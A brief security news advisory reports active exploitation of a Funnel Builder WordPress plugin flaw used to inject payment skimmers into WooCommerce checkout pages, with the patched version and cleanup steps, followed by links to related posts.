Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming

A critical Funnel Builder plugin flaw is being actively exploited to inject payment skimmers into WooCommerce checkout pages. Patch to 3.15.0.3 now.

What’s new: A critical vulnerability in the Funnel Builder plugin for WordPress is being actively exploited to inject malicious JavaScript into WooCommerce checkout pages, aiming to steal payment data. The flaw affects all versions prior to 3.15.0.3 and allows unauthenticated attackers to inject arbitrary JavaScript, which can load a payment skimmer disguised as Google Tag Manager scripts. FunnelKit has released a patch to address this issue.

Who’s affected

All users of the Funnel Builder plugin for WordPress prior to version 3.15.0.3, which is utilized in over 40,000 WooCommerce stores.

What to do

Update the Funnel Builder plugin to version 3.15.0.3 or later.
Review the Settings > Checkout > External Scripts for any unfamiliar entries and remove them.

Sources

The Hacker News

Funnel Builder Flaw Under Active Exploitation Enables WooCommerce Checkout Skimming

Who’s affected

What to do

Sources

Related Posts:

NSAuditor AI EE 0.4.9 Ships ElastiCache Redis Auditor v2 — KMS-DescribeKey Promotion + Subnet Route-Table Verifier Close Both v1 Deferred Items

NSAuditor AI EE 0.4.8 Ships Database Audit-Logging for AWS RDS — pgAudit + CloudWatch Logs Close SOC 2 CC7.2 / CC7.3 Gap

“NSAuditor AI Enterprise Edition 0.4.8 Boosts AWS RDS Audit Logging with Enhanced Features and SOC 2 Compliance”

NSAuditor AI EE 0.4.9 Ships ElastiCache Redis Auditor v2 — KMS-DescribeKey Promotion + Subnet Route-Table Verifier Close Both v1 Deferred Items

NSAuditor AI EE 0.4.8 Ships Database Audit-Logging for AWS RDS — pgAudit + CloudWatch Logs Close SOC 2 CC7.2 / CC7.3 Gap

“NSAuditor AI Enterprise Edition 0.4.8 Boosts AWS RDS Audit Logging with Enhanced Features and SOC 2 Compliance”

Turla Turns Kazuar Backdoor Into Modular P2P Botnet for Persistent Access